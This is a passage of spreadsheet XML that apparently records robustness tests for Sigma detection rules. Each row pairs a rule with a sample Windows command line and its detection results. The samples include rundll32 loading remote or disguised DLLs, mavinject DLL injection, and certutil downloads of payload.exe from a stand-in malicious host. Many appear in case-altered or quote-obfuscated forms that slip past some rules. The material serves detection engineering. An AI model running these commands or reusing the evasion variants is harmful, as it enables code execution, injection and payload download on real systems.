      </c>
      <c r="K1927" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1928" ht="15.75" customHeight="1" s="42">
      <c r="A1928" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B1928" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_installscreensaver</t>
        </is>
      </c>
      <c r="C1928" s="36" t="inlineStr">
        <is>
          <t>Rundll32 InstallScreenSaver Execution</t>
        </is>
      </c>
      <c r="D1928" s="36" t="inlineStr">
        <is>
          <t>15bd98ea-55f4-4d37-b09a-e7caa0fa2221</t>
        </is>
      </c>
      <c r="E1928" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe desk.cpl,InstallScreen""Saver not_an_scr.scr</t>
        </is>
      </c>
      <c r="F1928" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1928" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1928" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1928" s="36" t="n"/>
      <c r="J1928" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1928" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1929" ht="15.75" customHeight="1" s="42">
      <c r="A1929" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B1929" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_installscreensaver</t>
        </is>
      </c>
      <c r="C1929" s="36" t="inlineStr">
        <is>
          <t>Rundll32 InstallScreenSaver Execution</t>
        </is>
      </c>
      <c r="D1929" s="36" t="inlineStr">
        <is>
          <t>15bd98ea-55f4-4d37-b09a-e7caa0fa2221</t>
        </is>
      </c>
      <c r="E1929" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe desk.cpl, #1</t>
        </is>
      </c>
      <c r="F1929" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1929" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1929" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1929" s="43" t="n"/>
      <c r="J1929" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K1929" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1930" ht="15.75" customHeight="1" s="42">
      <c r="A1930" s="36" t="n"/>
      <c r="B1930" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_activity</t>
        </is>
      </c>
      <c r="C1930" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32 Activity</t>
        </is>
      </c>
      <c r="D1930" s="36" t="inlineStr">
        <is>
          <t>e593cf51-88db-4ee1-b920-37e89012a3c9</t>
        </is>
      </c>
      <c r="E1930" s="43" t="inlineStr">
        <is>
          <t>rundll32.exe shell32.dll,#250</t>
        </is>
      </c>
      <c r="F1930" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1930" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1930" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1930" s="43" t="n"/>
      <c r="J1930" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1930" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1931" ht="15.75" customHeight="1" s="42">
      <c r="A1931" s="43" t="n"/>
      <c r="B1931" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_execution_with_image_extension</t>
        </is>
      </c>
      <c r="C1931" s="36" t="inlineStr">
        <is>
          <t>Suspicious Rundll32 Execution With Image Extension</t>
        </is>
      </c>
      <c r="D1931" s="36" t="inlineStr">
        <is>
          <t>4aa6040b-3f28-44e3-a769-9208e5feb5ec</t>
        </is>
      </c>
      <c r="E1931" s="43" t="inlineStr">
        <is>
          <t>cd C:\test\ &amp;&amp; copy malicious.dll photo.jpg &amp;&amp; rundll32.exe .\photo.jpg,DllMain</t>
        </is>
      </c>
      <c r="F1931" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1931" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1931" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1931" s="43" t="n"/>
      <c r="J1931" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1931" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1932" ht="15.75" customHeight="1" s="42">
      <c r="A1932" s="43" t="n"/>
      <c r="B1932" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_susp_execution_with_image_extension</t>
        </is>
      </c>
      <c r="C1932" s="36" t="inlineStr">
        <is>
          <t>Suspicious Rundll32 Execution With Image Extension</t>
        </is>
      </c>
      <c r="D1932" s="36" t="inlineStr">
        <is>
          <t>4aa6040b-3f28-44e3-a769-9208e5feb5ec</t>
        </is>
      </c>
      <c r="E1932" s="43" t="inlineStr">
        <is>
          <t>copy calc.dll calc.dat &amp;&amp; rundll32.exe calc.dat,DllMain</t>
        </is>
      </c>
      <c r="F1932" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1932" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1932" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1932" s="43" t="n"/>
      <c r="J1932" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1932" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1933" ht="15.75" customHeight="1" s="42">
      <c r="A1933" s="36" t="n"/>
      <c r="B1933" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C1933" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D1933" s="36" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E1933" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c rundll32.exe oledb32.dll,OpenDSLFile C:\Users\user\Downloads\test.udl</t>
        </is>
      </c>
      <c r="F1933" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1933" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1933" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1933" s="43" t="n"/>
      <c r="J1933" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1933" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1934" ht="15.75" customHeight="1" s="42">
      <c r="A1934" s="36" t="n"/>
      <c r="B1934" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C1934" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D1934" s="36" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E1934" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe oledb32.dll,OpenDSLFile "C:\Users\admin\Downloads\test.udl"</t>
        </is>
      </c>
      <c r="F1934" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1934" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1934" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1934" s="43" t="n"/>
      <c r="J1934" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1934" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1935" ht="15.75" customHeight="1" s="42">
      <c r="A1935" s="36" t="n"/>
      <c r="B1935" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_udl_exec</t>
        </is>
      </c>
      <c r="C1935" s="36" t="inlineStr">
        <is>
          <t>Potentially Suspicious Rundll32.EXE Execution of UDL File</t>
        </is>
      </c>
      <c r="D1935" s="36" t="inlineStr">
        <is>
          <t>0ea52357-cd59-4340-9981-c46c7e900428</t>
        </is>
      </c>
      <c r="E1935" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe oledb32.dll,OpenDSLFile C:\ProgramData\test.udl</t>
        </is>
      </c>
      <c r="F1935" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1935" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1935" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1935" s="43" t="n"/>
      <c r="J1935" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1935" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1936" ht="15.75" customHeight="1" s="42">
      <c r="A1936" s="36" t="n"/>
      <c r="B1936" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C1936" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D1936" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E1936" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.100/share/payload.dll,EntryPoint</t>
        </is>
      </c>
      <c r="F1936" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1936" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1936" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1936" s="36" t="n"/>
      <c r="J1936" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K1936" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1937" ht="15.75" customHeight="1" s="42">
      <c r="A1937" s="36" t="n"/>
      <c r="B1937" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C1937" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D1937" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E1937" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/share/payload.dll,EntryPoint</t>
        </is>
      </c>
      <c r="F1937" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1937" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1937" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1937" s="36" t="n"/>
      <c r="J1937" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1937" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1938" ht="15.75" customHeight="1" s="42">
      <c r="A1938" s="36" t="n"/>
      <c r="B1938" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C1938" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D1938" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E1938" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe /"/192.168.1.1/share/payload.dll,EntryPoint"</t>
        </is>
      </c>
      <c r="F1938" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1938" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1938" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1938" s="43" t="n"/>
      <c r="J1938" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1938" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1939" ht="15.75" customHeight="1" s="42">
      <c r="A1939" s="36" t="n"/>
      <c r="B1939" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C1939" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D1939" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E1939" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe -"/192.168.1.1/share/payload.dll,EntryPoint"</t>
        </is>
      </c>
      <c r="F1939" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1939" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1939" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1939" s="36" t="n"/>
      <c r="J1939" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1939" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1940" ht="15.75" customHeight="1" s="42">
      <c r="A1940" s="36" t="n"/>
      <c r="B1940" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C1940" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D1940" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E1940" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/SHAre/pAYLOAd.Dll,enTrypoiNT</t>
        </is>
      </c>
      <c r="F1940" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1940" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1940" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1940" s="36" t="n"/>
      <c r="J1940" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1940" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1941" ht="15.75" customHeight="1" s="42">
      <c r="A1941" s="36" t="n"/>
      <c r="B1941" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_unc_path</t>
        </is>
      </c>
      <c r="C1941" s="36" t="inlineStr">
        <is>
          <t>Rundll32 UNC Path Execution</t>
        </is>
      </c>
      <c r="D1941" s="36" t="inlineStr">
        <is>
          <t>5cdb711b-5740-4fb2-ba88-f7945027afac</t>
        </is>
      </c>
      <c r="E1941" s="36" t="inlineStr">
        <is>
          <t>rundll32.exe //192.168.1.1/shAre/PaylOAD.dLl,EnTRYPOInt</t>
        </is>
      </c>
      <c r="F1941" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1941" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1941" s="36" t="b">
        <v>1</v>
      </c>
      <c r="I1941" s="36" t="n"/>
      <c r="J1941" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1941" s="36" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="1942" ht="15.75" customHeight="1" s="42">
      <c r="A1942" s="36" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B1942" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C1942" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D1942" s="36" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E1942" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 /injECTrUnnING C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F1942" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1942" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1942" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1942" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process (4f73421b-5a0b-4bbf-a892-5a7fb99bea66); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1942" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1942" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1943" ht="15.75" customHeight="1" s="42">
      <c r="A1943" s="36" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B1943" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C1943" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D1943" s="36" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E1943" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 /InJecTRunninG C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F1943" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1943" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1943" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1943" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process (4f73421b-5a0b-4bbf-a892-5a7fb99bea66); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1943" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1943" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1944" ht="15.75" customHeight="1" s="42">
      <c r="A1944" s="36" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B1944" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C1944" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D1944" s="36" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E1944" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 /"INJECTRUNNING" C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F1944" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1944" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1944" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1944" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1944" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1944" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1945" ht="15.75" customHeight="1" s="42">
      <c r="A1945" s="36" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B1945" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C1945" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D1945" s="36" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E1945" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 -"INJECTRUNNING" C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F1945" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1945" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1945" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1945" s="36" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1945" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1945" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1946" ht="15.75" customHeight="1" s="42">
      <c r="A1946" s="36" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B1946" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C1946" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D1946" s="36" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E1946" s="36" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\mavinject.exe C:\Users\Public\not_mavinject.exe &amp;&amp; C:\Users\Public\not_mavinject.exe 1234 /injeCtRuNNING C:\temp\evil.dll</t>
        </is>
      </c>
      <c r="F1946" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1946" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H1946" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1946" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process (4f73421b-5a0b-4bbf-a892-5a7fb99bea66); Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J1946" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1946" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1947" ht="15.75" customHeight="1" s="42">
      <c r="A1947" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B1947" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C1947" s="36" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D1947" s="36" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E1947" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start remote.exe -arg1 -arg2</t>
        </is>
      </c>
      <c r="F1947" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G1947" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1947" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I1947" s="43" t="n"/>
      <c r="J1947" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K1947" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1948" ht="15.75" customHeight="1" s="42">
      <c r="A1948" s="43" t="n"/>
      <c r="B1948" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1948" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1948" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1948" s="43" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1948" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1948" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1948" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1948" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1948" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1948" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1949" ht="15.75" customHeight="1" s="42">
      <c r="A1949" s="43" t="n"/>
      <c r="B1949" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1949" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1949" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1949" s="36" t="inlineStr">
        <is>
          <t>certutil -uRLCAcHE /"split" -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1949" s="36" t="b">
        <v>1</v>
      </c>
      <c r="G1949" s="36" t="b">
        <v>1</v>
      </c>
      <c r="H1949" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I1949" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1949" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K1949" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1950" ht="15.75" customHeight="1" s="42">
      <c r="A1950" s="43" t="n"/>
      <c r="B1950" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1950" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1950" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1950" s="43" t="inlineStr">
        <is>
          <t>certutil -urlcache -split -"f" http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1950" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1950" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1950" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1950" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1950" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1950" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1951" ht="15.75" customHeight="1" s="42">
      <c r="A1951" s="43" t="n"/>
      <c r="B1951" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1951" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1951" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1951" s="43" t="inlineStr">
        <is>
          <t>certutil -uRLcAChE -split -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1951" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1951" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1951" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1951" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1951" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1951" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1952" ht="15.75" customHeight="1" s="42">
      <c r="A1952" s="43" t="n"/>
      <c r="B1952" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1952" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1952" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1952" s="43" t="inlineStr">
        <is>
          <t>certutil -urlcache -"split" -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1952" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1952" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1952" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1952" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1952" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1952" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1953" ht="15.75" customHeight="1" s="42">
      <c r="A1953" s="43" t="n"/>
      <c r="B1953" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1953" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1953" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E1953" s="43" t="inlineStr">
        <is>
          <t>certutil -urlcache -sPlIt -f http://malicious-site.com/payload.exe C:\temp\payload.exe</t>
        </is>
      </c>
      <c r="F1953" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G1953" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H1953" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I1953" s="43" t="inlineStr">
        <is>
          <t>Suspicious Download Via Certutil.EXE (19b08b1c-861d-4e75-a1ef-ea0c1baf202b)</t>
        </is>
      </c>
      <c r="J1953" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K1953" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="1954" ht="15.75" customHeight="1" s="42">
      <c r="A1954" s="43" t="n"/>
      <c r="B1954" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C1954" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D1954" s="36" t="inlineStr">
        <is>
